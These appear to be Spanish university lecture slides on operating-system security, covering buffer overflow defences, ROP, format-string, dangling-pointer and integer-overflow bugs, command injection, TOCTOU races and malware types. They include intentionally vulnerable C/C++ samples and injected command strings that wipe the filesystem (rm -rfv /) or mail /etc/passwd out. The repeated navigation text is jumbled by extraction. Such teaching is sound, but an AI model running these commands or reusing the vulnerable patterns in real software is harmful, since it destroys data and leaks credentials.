Modelos
Ataques
formales
de cadena
de seguridad
de formato
Bases
Introducci´
Punteros
de la criptograf´
colgados
on Entorno
ıa(dangling
Autenticaci´
de seguridad
pointers)
on Software
Seguridad
Ataques
deen
de
explotaci´
sistemas
desreferencia
onoperativos
Ataques
de Ataques
punteros
desde
Control
de
dentro
nulos
desbordamiento
de acceso
Ataques
Software
a recursos
demalicioso
de
desbordamiento
b´
ufer
Modelos
Ataques
formales
dede
enteros
cadena
de seguridad
Ataques
de formato
inyecci´
Bases
Punte
ode
nd
Software de explotaci´on
Finalidad: Explotar vulnerabilidades del SO/software.
Ejemplos:
http://pccito.ugr.es/~gustavo/ss/boom.html
Responsable: ¿Web? ¿Atacante? ¿ISP? ¿Intermediario?
Drive-by-download: descarga, autorizada o no, de software
malicioso.
Intermediario (Man in the middle):
Software de explotaci´on
Intercepci´
on de la comunicaci´
on (eavesdropping).
Sustituci´
on.
Repetici´
on.
Denegaci´
on de servicio (denial of service).
Efecto Reina Roja: los ataques se vuelven m´as sofisticados
a la vez que lo hacen las medidas de seguridad.
Cada exploit aprovecha un fallo software.
Existen contramedidas para tratar de evitar los exploits.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
53 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
54 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Ataques
Control
de desbordamiento
de acceso a recursos
de b´
ufer
Modelos
Ataques
formales
de cadena
de seguridad
de formato
Bases
Introducci´
Punteros
de la criptograf´
colgados
on Entorno
ıa(dangling
Autenticaci´
de seguridad
pointers)
on Software
Seguridad
Ataques
deen
de
explotaci´
sistemas
desreferencia
onoperativos
Ataques
de Ataques
punteros
desde
Control
de
dentro
nulos
desbordamiento
de acceso
Ataques
Software
a recursos
demalicioso
de
desbordamiento
b´
ufer
Modelos
Ataques
formales
dede
enteros
cadena
de seguridad
Ataques
de formato
inyecci´
Bases
Punte
ode
nd
Ataques de desbordamiento de b´ufer
Ataques de desbordamiento de b´ufer
Buffer overflow attacks
Van a seguir con nosotros (Van der Veen, 2012).
Motivo: uso de lenguajes de programaci´on
susceptibles.
No comprueban autom´aticamente el l´ımite de un b´
ufer.
Se consigue el nivel de privilegio del programa
vulnerable.
Contramedidas en sistemas modernos:
Canarios (Stack canaries).
Protecci´
on de ejecuci´
on de datos (Data Execution Protection
(DEP)).
Aleatorizaci´
on del espacio de direcciones (Address-Space
Layout Randomization (ASLR)).
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
55 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
56 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Ataques
Control
de desbordamiento
de acceso a recursos
de b´
ufer
Modelos
Ataques
formales
de cadena
de seguridad
de formato
Bases
Introducci´
Punteros
de la criptograf´
colgados
on Entorno
ıa(dangling
Autenticaci´
de seguridad
pointers)
on Software
Seguridad
Ataques
deen
de
explotaci´
sistemas
desreferencia
onoperativos
Ataques
de Ataques
punteros
desde
Control
de
dentro
nulos
desbordamiento
de acceso
Ataques
Software
a recursos
demalicioso
de
desbordamiento
b´
ufer
Modelos
Ataques
formales
dede
enteros
cadena
de seguridad
Ataques
de formato
inyecci´
Bases
Punte
ode
nd
Ataques de desbordamiento de b´ufer
Canarios
¿Es seguro?
C
1
M´etodo de defensa contra los ataques de desbordamiento
de b´ufer.
Procedencia del nombre: canarios utilizados en las minas.
Dejar un valor aleatorio en la pila bajo la direcci´on de
retorno y comprobar que sigue all´ı tras una llamada.
Debe usarse expl´ıcitamente:
gcc -fstack-protector{-all}
ejemplo: http://xorl.wordpress.com/2010/10/14/
linux-glibc-stack-canary-values/
char buffer [100];
2
3
4
for ( int i = 0; i < 100; ++ i )
buffer [ i ] = ...
C++
1
std :: vector < int > buffer (100) ;
2
3
4
for ( int i = 0; i < buffer . size () ; ++ i )
buffer [ i ] = ...
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
57 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
58 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Ataques
Control
de desbordamiento
de acceso a recursos
de b´
ufer
Modelos
Ataques
formales
de cadena
de seguridad
de formato
Bases
Introducci´
Punteros
de la criptograf´
colgados
on Entorno
ıa(dangling
Autenticaci´
de seguridad
pointers)
on Software
Seguridad
Ataques
deen
de
explotaci´
sistemas
desreferencia
onoperativos
Ataques
de Ataques
punteros
desde
Control
de
dentro
nulos
desbordamiento
de acceso
Ataques
Software
a recursos
demalicioso
de
desbordamiento
b´
ufer
Modelos
Ataques
formales
dede
enteros
cadena
de seguridad
Ataques
de formato
inyecci´
Bases
Punte
ode
nd
Evitando los canarios
Protecci´on de ejecuci´on de datos
Data Execution Protection (DEP)
La causa real del problema no es la capacidad de un
atacante de sobrescribir punteros a funci´on o direcciones
de retorno sino la capacidad de inyectar c´
odigo.
¿Por qu´e no hacer imposible la ejecuci´
on de c´odigo en
las zonas de datos?
Los ataques de inyecci´
on de c´
odigo dejar´ıan de
funcionar.
Los procesadores modernos tiene el bit NX (No Execute).
Empleado en todos los sistemas operativos modernos.
Formas de conseguir DEP:
No alterarlo o hacerlo tras su verificaci´on.
El desbordamiento de b´ufer no se limita a direcciones de
retorno.
Los punteros a funci´
on son vulnerables.
Tanto pila como mont´ıculo (heap) son vulnerables.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
bit NX (No Execute).
Software.
59 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
60 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Ataques
Control
de desbordamiento
de acceso a recursos
de b´
ufer
Modelos
Ataques
formales
de cadena
de seguridad
de formato
Bases
Introducci´
Punteros
de la criptograf´
colgados
on Entorno
ıa(dangling
Autenticaci´
de seguridad
pointers)
on Software
Seguridad
Ataques
deen
de
explotaci´
sistemas
desreferencia
onoperativos
Ataques
de Ataques
punteros
desde
Control
de
dentro
nulos
desbordamiento
de acceso
Ataques
Software
a recursos
demalicioso
de
desbordamiento
b´
ufer
Modelos
Ataques
formales
dede
enteros
cadena
de seguridad
Ataques
de formato
inyecci´
Bases
Punte
ode
nd
Ataques de reutilizaci´on de c´odigo
return to libc
Dado que...
Los canarios dificultan sobrescribir direcciones de retorno y
punteros a funci´
on.
DEP impide la ejecuci´
on de c´
odigo en regiones de datos.
¿Para qu´e molestarnos en inyectar nuevo c´odigo
si nuestros programas est´an llenos de ´el?
Ataques cl´asicos de reutilizaci´on de c´odigo:
Supongamos que podemos cambiar la direcci´on de retorno
pero no ejecutar c´odigo sobre la pila.
¿A d´onde retornar?
Casi todos los programas enlazan funciones de libc.
Escoger binario y funci´on: system, mprotect,... o PLT
(Procedure Linkage Table).
return to libc
return-oriented programming (ROP)
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
61 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
62 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Ataques
Control
de desbordamiento
de acceso a recursos
de b´
ufer
Modelos
Ataques
formales
de cadena
de seguridad
de formato
Bases
Introducci´
Punteros
de la criptograf´
colgados
on Entorno
ıa(dangling
Autenticaci´
de seguridad
pointers)
on Software
Seguridad
Ataques
deen
de
explotaci´
sistemas
desreferencia
onoperativos
Ataques
de Ataques
punteros
desde
Control
de
dentro
nulos
desbordamiento
de acceso
Ataques
Software
a recursos
demalicioso
de
desbordamiento
b´
ufer
Modelos
Ataques
formales
dede
enteros
cadena
de seguridad
Ataques
de formato
inyecci´
Bases
Punte
ode
nd
return-oriented programming (ROP)
Aleatorizaci´on del espacio de direcciones
Address-Space Layout Randomization (ASLR)
M´as complejo y
frecuente hoy d´ıa.
En lugar de retornar
siempre al principio de
una funci´on escoger
cualquier direcci´
on del
segmento de c´
odigo.
Buscar fragmentos u´tiles
de c´odigo acabados en
una instrucci´on de
retorno.
Compiladores ROP:
herramientas
autom´aticas.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
Suele ser posible elegir una direcci´
on exacta de retorno.
En el peor de los casos por fuerza bruta.
¿Qu´e pasar´ıa si las direcciones de mi programa cambian
cada vez que lo ejecuto?
¿Qu´e cambiar? Pila, mont´ıculo y bibliotecas.
Usado por la mayor´ıa de los sistemas operativos.
Canarios + DEP + ASLR = costo razonable.
63 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
64 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Ataques
Control
de desbordamiento
de acceso a recursos
de b´
ufer
Modelos
Ataques
formales
de cadena
de seguridad
de formato
Bases
Introducci´
Punteros
de la criptograf´
colgados
on Entorno
ıa(dangling
Autenticaci´
de seguridad
pointers)
on Software
Seguridad
Ataques
deen
de
explotaci´
sistemas
desreferencia
onoperativos
Ataques
de Ataques
punteros
desde
Control
de
dentro
nulos
desbordamiento
de acceso
Ataques
Software
a recursos
demalicioso
de
desbordamiento
b´
ufer
Modelos
Ataques
formales
dede
enteros
cadena
de seguridad
Ataques
de formato
inyecci´
Bases
Punte
ode
nd
Evitando ASLR
Ataques que no modifican la secuencia de ejecuci´on
La mayor´ıa de los ataques intentan modificar direcciones
de retorno y punteros a funci´on para conseguir nueva
funcionalidad.
Existe otro tipo de ataques en que la modificaci´on de los
datos basta.
Los exploits siguen apareciendo... ¿C´omo es posible?
ASLR no suele ser tan aleatorio como deber´ıa.
Ejemplo de ataque, goteo de memoria:
Introducir un n´umero menor que 0 o mayor que 15.
Conocida una direcci´on de memoria es f´acil averiguar el
resto.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
65 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
66 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Ataques
Control
de desbordamiento
de acceso a recursos
de b´
ufer
Modelos
Ataques
formales
de cadena
de seguridad
de formato
Bases
Introducci´
Punteros
de la criptograf´
colgados
on Entorno
ıa(dangling
Autenticaci´
de seguridad
pointers)
on Software
Seguridad
Ataques
deen
de
explotaci´
sistemas
desreferencia
onoperativos
Ataques
de Ataques
punteros
desde
Control
de
dentro
nulos
desbordamiento
de acceso
Ataques
Software
a recursos
demalicioso
de
desbordamiento
b´
ufer
Modelos
Ataques
formales
dede
enteros
cadena
de seguridad
Ataques
de formato
inyecci´
Bases
Punte
ode
nd
Desbordamiento de b´ufer: la no tan u´ltima palabra
Ataques de cadena de formato
Ataque de corrupci´on de memoria.
Permite escribir cualquier cosa en cualquier sitio.
A los programadores no les gusta teclear...
Es una de las t´ecnicas m´as antiguas y utilizadas.
Parece imposible acabar con ellas1 .
Reparto de culpas: lenguaje de
programaci´on/programadores.
Activo campo de investigaci´
on:
seguro
1
2
Medidas de seguridad en los binarios.
Extensiones de seguridad para compiladores.
vulnerable
1
2
1
Victor van Der Veen, Nitish dutt-Sharma, Lorenzo Cavallaro y Hertbert
Bos. Memory errors: the past, the present, and the future. En Research in
Attacks, Intrusions, and Defenses. P´
aginas: 86-106. Springer. 2012.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
char * s = " hola mundo " ;
printf ( " %s " , s ) ;
67 / 91
char * s = " hola mundo " ;
printf ( s ) ;
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
68 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Ataques
Control
de desbordamiento
de acceso a recursos
de b´
ufer
Modelos
Ataques
formales
de cadena
de seguridad
de formato
Bases
Introducci´
Punteros
de la criptograf´
colgados
on Entorno
ıa(dangling
Autenticaci´
de seguridad
pointers)
on Software
Seguridad
Ataques
deen
de
explotaci´
sistemas
desreferencia
onoperativos
Ataques
de Ataques
punteros
desde
Control
de
dentro
nulos
desbordamiento
de acceso
Ataques
Software
a recursos
demalicioso
de
desbordamiento
b´
ufer
Modelos
Ataques
formales
dede
enteros
cadena
de seguridad
Ataques
de formato
inyecci´
Bases
Punte
ode
nd
Ataques de cadena de formato
Ataques de cadena de formato
Par´
ametros m´
as utilizados en este tipo de ataques
ejemplo de uso de %n: n´
umero de caracteres impresos
int i = 0;
printf ( " hola %n mundo \ n " , & i ) ;
printf ( " i = %d \ n " , i ) ;
5
6
7
programa vulnerable
char s [100] , g [100] = " hola " ;
gets ( s ) ;
// lee s
strcat (g , s ) ; // g += s
printf ( g ) ;
// escribe s
6
7
8
9
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
Gustavo Romero L´
opez
69 / 91
Seguridad en Sistemas Operativos
70 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Ataques
Control
de desbordamiento
de acceso a recursos
de b´
ufer
Modelos
Ataques
formales
de cadena
de seguridad
de formato
Bases
Introducci´
Punteros
de la criptograf´
colgados
on Entorno
ıa(dangling
Autenticaci´
de seguridad
pointers)
on Software
Seguridad
Ataques
deen
de
explotaci´
sistemas
desreferencia
onoperativos
Ataques
de Ataques
punteros
desde
Control
de
dentro
nulos
desbordamiento
de acceso
Ataques
Software
a recursos
demalicioso
de
desbordamiento
b´
ufer
Modelos
Ataques
formales
dede
enteros
cadena
de seguridad
Ataques
de formato
inyecci´
Bases
Punte
ode
nd
Ataques de cadena de formato
Punteros colgados
Dangling pointers
http://pccito.ugr.es/ss/teoria/seguridad/src/fsa-exploit.c
4
5
6
7
8
9
10
int main ( int argc , char ** argv )
{
char buffer [100];
strncpy ( buffer , argv [1] , 100) ;
printf ( buffer ) ;
return 0;
}
T´ecnica de corrupci´on de memoria.
Causa: acceso a un ´area de memoria de la que ya no
somos propietarios.
1
2
3
4
Muchos ejemplos en Internet:
int * buffer = new int [100];
// hacer algo con buffer
delete [] buffer ;
buffer [0] = 7;
//
//
//
//
:)
:)
:)
:(
El ataque heap feng shui permite escoger qu´e colocar en
esa direcci´on de memoria.
http://codearcana.com/posts/2013/05/02/
introduction-to-format-string-exploits.html
https:
//www.owasp.org/index.php/Format_string_attack
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
71 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
72 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Ataques
Control
de desbordamiento
de acceso a recursos
de b´
ufer
Modelos
Ataques
formales
de cadena
de seguridad
de formato
Bases
Introducci´
Punteros
de la criptograf´
colgados
on Entorno
ıa(dangling
Autenticaci´
de seguridad
pointers)
on Software
Seguridad
Ataques
deen
de
explotaci´
sistemas
desreferencia
onoperativos
Ataques
de Ataques
punteros
desde
Control
de
dentro
nulos
desbordamiento
de acceso
Ataques
Software
a recursos
demalicioso
de
desbordamiento
b´
ufer
Modelos
Ataques
formales
dede
enteros
cadena
de seguridad
Ataques
de formato
inyecci´
Bases
Punte
ode
nd
Ataques de desreferencia de punteros nulos
Ataques de desbordamiento de enteros
En cada acceso a memoria la MMU traduce de direcci´on
virtual a f´ısica.
Linux de 32 bits: espacio de usuario (3GB)/n´ucleo (1GB).
Motivo de la cohabitaci´on: eficiencia, cambiar de espacio
de direcciones es costoso.
Mecanismo explotado: llamar funciones de usuario desde
el n´ucleo.
La desreferencia de un puntero nulo produce un fallo
porque no hay c´odigo mapeado en la p´agina 0.
Exploit: mapear direcci´on 0, copiar un shellcode y
provocar la desreferencia.
Soluci´on: prohibir a mmap la direcci´on 0.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
Aritm´etica entera de longitud fija: 8..128 bits.
La mayor´ıa de lenguajes no detectan este error.
Secuencia:
1
2
3
73 / 91
entrada de usuario
desbordamiento de enteros
desbordamiento de b´
ufer
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
74 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Ataques
Control
de desbordamiento
de acceso a recursos
de b´
ufer
Modelos
Ataques
formales
de cadena
de seguridad
de formato
Bases
Introducci´
Punteros
de la criptograf´
colgados
on Entorno
ıa(dangling
Autenticaci´
de seguridad
pointers)
on Software
Seguridad
Ataques
deen
de
explotaci´
sistemas
desreferencia
onoperativos
Ataques
de Ataques
punteros
desde
Control
de
dentro
nulos
desbordamiento
de acceso
Ataques
Software
a recursos
demalicioso
de
desbordamiento
b´
ufer
Modelos
Ataques
formales
dede
enteros
cadena
de seguridad
Ataques
de formato
inyecci´
Bases
Punte
ode
nd
Ataques de inyecci´on de o´rdenes
Ataques comprobaci´on/uso
Time of Check to Time of Use Attacks (TOCTOU)
http://pccito.ugr.es/ss/teoria/seguridad/src/command.injection.cc
7
8
9
10
11
12
13
14
Explotaci´on de una condici´on de carrera.
std :: string orden = " cp " , origen , destino ;
std :: cout << " Fichero origen : " ;
std :: getline ( std :: cin , origen ) ;
orden += origen ;
std :: cout << " Fichero destino : " ;
std :: getline ( std :: cin , destino ) ;
orden += " " + destino ;
system ( orden . c_str () ) ;
victima ejecutando programa setuid root
1
2
3
4
Un atacante debe alterar file tras la comprobaci´on, l´ınea
1, y antes del uso, l´ıneas 3 y 4.
Hacer que un programa ejecute o´rdenes sin darse cuenta
de que lo est´a haciendo.
Ejemplos:
programa atacante
symlink("/etc/passwd", "file");
cp abc xyz
cp abc xyz; rm -rfv /
cp abc xyz; mail [email protected] < /etc/passwd
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
if ( access ( " file " , W_OK ) != 0)
exit (1) ;
fd = open ( " file " , O_WRONLY ) ;
write ( fd , buffer , sizeof ( buffer ) ) ;
Se consigue escalar privilegios.
75 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
76 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos Control de acceso a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques desde
Control
dentro
de acceso
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Ataques desde dentro
Ejecutados por empleados.
Poseen informaci´on con la que un atacante externo no
cuenta.
Clasificaci´on:
Ataques desde dentro
Bombas l´ogicas.
Puertas traseras.
Suplantaci´on de identidad (login spoofing).
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
77 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
78 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos Control de acceso a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques desde
Control
dentro
de acceso
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Bombas l´ogicas
Puertas traseras
C´odigo que da acceso a funcionalidades restringidas.
Raz´on por la que las revisiones de c´
odigo son
obligatorias.
En ´epocas de externalizaci´on existen personas que se
preparan ante una eventual ”patada en el culo”.
C´odigo para sabotear el funcionamiento de un programa.
Motivo: chantaje de un trabajador a su empleador.
intento de puerta trasera en linux en 2003
1
2
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
79 / 91
if (( options == ( __WCLONE | __WALL ) ) && (
current - > uid = 0) )
retval = - EINVAL ;
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
80 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos Control de acceso a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Troyanos
desde
Control
dentro
Virus
de acceso
Gusanos
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Suplantaci´on de identidad
login spoofing
Un usuario leg´ıtimo intenta conseguir las claves
de los dem´as.
Ejemplo: falsificaci´on de la pantalla de
identificaci´on.
Software malicioso
Contramedida: pulsaci´on de CTRL-ALT-DEL.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
81 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
82 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Troyanos
ControlVirus
de acceso
Gusanos
a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Troyanos
desde
Control
dentro
Virus
de acceso
Gusanos
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Software malicioso
Troyanos
malware
Troyano −→ virus −→ gusano
Compromete el sistema −→ se autoreplica con
intervenci´on humana −→ no requiere la intervenci´on del
usuario
Responsables de da˜nos por millones de euros.
Escritos por aburrimiento o deseo de impresionar sin hacer
dinero con ello.
Por desgracia se ha profesionalizado: crimen y guerra.
Zombi (Zombie): m´aquina comprometida.
Botnet: colecci´on de zombis.
Delitos con el apellido “cibern´etico”: spam, chantaje,
robo, extorsi´on, fraude, miner´ıa, robo de identidad, ...
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
Escribir software es f´acil.
Conseguir que mucha gente lo ejecute es dif´ıcil.
Truco: a˜nadir el software a un programa
atractivo.
Una vez dentro suele copiarse y asegurar su
reinicio autom´atico adem´as de cumplir con su
funci´on (payload).
Funciones habituales: buscar (claves, no de
tarjeta), destruir, cifrar, zombificar, ...
83 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
84 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Troyanos
ControlVirus
de acceso
Gusanos
a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Troyanos
desde
Control
dentro
Virus
de acceso
Gusanos
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Virus
Tipos de virus I
Virus acompa˜
nante (companion virus): se ejecuta en
lugar de otro programa sin infectarlo.
Un virus es un programa que es capaz de hacer
copias de s´ı mismo.
Suelen estar escritos en ensamblador o C.
Suelen distribuirse infectando software leg´ıtimo.
Una vez alcanza su objetivo tiene dos misiones:
autoreplicarse y ejecutar su carga (payload).
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
En la ´epoca del MSDOS, al escribir prog en lugar de
ejecutarse prog.exe en su lugar se ejecutaba prog.com.
Virus de programa ejecutable: sobrescribe un
ejecutable con su c´odigo (overwritting virus).
Cuantos m´as binarios sobrescriba antes ser´a detectado.
Existe una versi´on para MSDOS en ensamblador de 44 bytes.
Son muy f´aciles de detectar.
Virus par´asitos: permite el normal funcionamiento del
programa infectado.
85 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
86 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Troyanos
ControlVirus
de acceso
Gusanos
a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Troyanos
desde
Control
dentro
Virus
de acceso
Gusanos
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Tipos de virus II
Tipos de virus III
Virus de sector de arranque: al encender el ordenador
la BIOS ejecuta el MBR.
El virus se sit´
ua en el MBR y sectores en desuso o marcados
como estropeados.
Ejecutamos el virus en cada arranque.
El nivel de privilegio es total.
Durante el arranque del SO el virus se hace residente en
memoria.
Virus de controlador de dispositivo (device driver
virus): hacer un virus residente en memoria es dif´ıcil, es
mucho mejor si el SO lo carga disfrazado de controlador
de dispositivo.
Virus residentes en memoria: es capaz de permacener
en memoria independientemente del programa desde el
que inicio su ejecuci´on.
Mejor ubicaci´
on: vector de interrupciones.
Se ejecuta con cada llamada al sistema.
Una vez detectado exec() infecta al nuevo programa.
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
En windows los controladores son programas ejecutables.
Se cargan al arrancar el sistema.
Se ejecutan en modo n´
ucleo.
87 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
88 / 91
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Troyanos
ControlVirus
de acceso
Gusanos
a recursos Modelos formales de seguridad Bases
Introducci´
de la criptograf´
on Entorno
ıa Autenticaci´
de seguridad
on Software
Seguridaddeenexplotaci´
sistemasonoperativos
Ataques
Troyanos
desde
Control
dentro
Virus
de acceso
Gusanos
Software
a recursos
malicioso
Modelos formales de seguridad Bases de
Tipos de virus IV
Gusanos
Macro Virus: virus escrito en un lenguaje
interpretado.
Primer gusano liberado por R.T. Morris en 1988.
Descubri´o dos fallos en UNIX.
Escribi´o un programa los explotaba para conseguir acceso
y replicarse.
La mayor´ıa de sistemas Sun y VAX cayeron.
2 partes: arranque (rsh, finger, sendmail) y gusano
(passwd).
Como consecuencia se cre´o el CERT (Computer
Emergency Response Team).
Las macros de Office permite ejecutar programas escritos en
Visual Basic.
La mayor parte de la gente no sabe lo que es.
Siguen existiendo por su gran utilidad.
Virus de c´
odigo fuente: para evitar que el virus dependa
de un SO esconder entre las l´ıneas del fuente de un
programa:
1
2
# include < virus .h >
ejecutar_virus () ;
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
89 / 91
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
Introducci´
on Entorno de seguridad Seguridad en sistemas operativos
Troyanos
ControlVirus
de acceso
Gusanos
a recursos Modelos formales de seguridad Bases de la criptograf´ıa Autenticaci´
on Software de explotaci´
on Ataques desde dentro Software malicioso
Bibliograf´ıa
B´asica:
Modern Operating Systems (4th Edition). Andrew S.
Tanenbaum. Prentice Hall. 2014.
Adicional:
Wikipedia: Seguridad Inform´atica
Carnegie Mellon University: Operating System Security
Gustavo Romero L´
opez
Seguridad en Sistemas Operativos
91 / 91
90 / 91
© Copyright 2024